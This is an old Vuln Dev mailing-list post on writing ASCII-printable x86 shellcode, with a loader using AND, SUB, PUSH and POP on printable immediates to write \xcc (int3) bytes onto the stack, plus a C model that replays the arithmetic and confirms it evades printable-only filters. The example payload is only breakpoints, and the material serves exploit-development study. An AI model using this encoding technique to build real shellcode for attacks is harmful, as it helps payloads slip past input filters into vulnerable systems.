Vuln Dev
Writing ascii shellcode (\xcc) Jul 04 2007 03:43PM
lists73 skilltube com
There was a question regarding ascii shellcode development and in particular, how to get the \xcc opcode. We had a similar problem a few weeks ago and we solved it with a well-known approach documented by Steve Hanna. The example below might help others as well.

Suppose we want to create the following small shellcode (just an example):

int3
int3
int3
int3

The corresponding opcodes look like the following:

\xcc\xcc\xcc\xcc

These are definitely not printable characters. However, we can write them on the fly with the following loader code (does not contain non-printable characters):

// eax == 0
and eax,454e4f4a
and eax,3a313035

// make "room" for the real shellcode
push esp
pop eax
sub eax,39393333
sub eax,72727550
sub eax,54545645 // depends on the space needed
push eax
pop esp

// write last four byte block of our shellcode
and eax,454e4f4a
and eax,3a313035
sub eax,66666666
sub eax,66666666
sub eax,66666668
push eax

// write next four byte block of our shellcode
etc.
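Added example, not part of the original post: a small C model of the loader above that replays its register arithmetic and checks that every opcode and immediate byte is printable ASCII, which is why a printable-only input filter does not stop it. The one-byte opcodes are the standard x86 encodings; the starting eax and esp values in main are constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* One-byte x86 opcodes for the instructions the loader uses. */
enum op { AND_EAX = 0x25, SUB_EAX = 0x2d, PUSH_ESP = 0x54,
          POP_EAX = 0x58, PUSH_EAX = 0x50, POP_ESP = 0x5c };
struct insn { enum op op; uint32_t imm; };
struct state { uint32_t eax, esp, tos; };   /* tos = last value pushed */

static const struct insn loader[] = {       /* transcribed from the post */
    {AND_EAX, 0x454e4f4a}, {AND_EAX, 0x3a313035},
    {PUSH_ESP, 0}, {POP_EAX, 0},
    {SUB_EAX, 0x39393333}, {SUB_EAX, 0x72727550}, {SUB_EAX, 0x54545645},
    {PUSH_EAX, 0}, {POP_ESP, 0},
    {AND_EAX, 0x454e4f4a}, {AND_EAX, 0x3a313035},
    {SUB_EAX, 0x66666666}, {SUB_EAX, 0x66666666}, {SUB_EAX, 0x66666668},
    {PUSH_EAX, 0},
};
#define LOADER_LEN (sizeof loader / sizeof loader[0])

/* Replay the loader with 32-bit wraparound, as the CPU would. */
static struct state run(uint32_t eax, uint32_t esp) {
    struct state s = { eax, esp, 0 };
    for (size_t i = 0; i < LOADER_LEN; i++) {
        switch (loader[i].op) {
        case AND_EAX:  s.eax &= loader[i].imm; break;
        case SUB_EAX:  s.eax -= loader[i].imm; break;
        case PUSH_ESP: s.tos = s.esp; s.esp -= 4; break;
        case PUSH_EAX: s.tos = s.eax; s.esp -= 4; break;
        case POP_EAX:  s.eax = s.tos; s.esp += 4; break;
        case POP_ESP:  s.esp = s.tos; break;  /* esp takes the popped value */
        }
    }
    return s;
}

/* 1 if every opcode byte and every imm32 byte lies in 0x20..0x7e. */
static int loader_is_printable(void) {
    for (size_t i = 0; i < LOADER_LEN; i++) {
        uint32_t v = loader[i].imm;
        int has_imm = loader[i].op == AND_EAX || loader[i].op == SUB_EAX;
        if (loader[i].op < 0x20 || loader[i].op > 0x7e) return 0;
        for (int k = 0; has_imm && k < 4; k++, v >>= 8)
            if ((v & 0xff) < 0x20 || (v & 0xff) > 0x7e) return 0;
    }
    return 1;
}

int main(void) {
    struct state s = run(0xdeadbeef, 0x0012ff00);   /* constructed inputs */
    printf("pushed %08x at esp=%08x, printable=%d\n",
           (unsigned)s.tos, (unsigned)s.esp, loader_is_printable());
    return 0;
}
```

The three "make room" subtractions sum to 0xfffffec8, so they move esp up by 0x138 bytes, and the final push stores \xcc\xcc\xcc\xcc in the four bytes just below that address.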
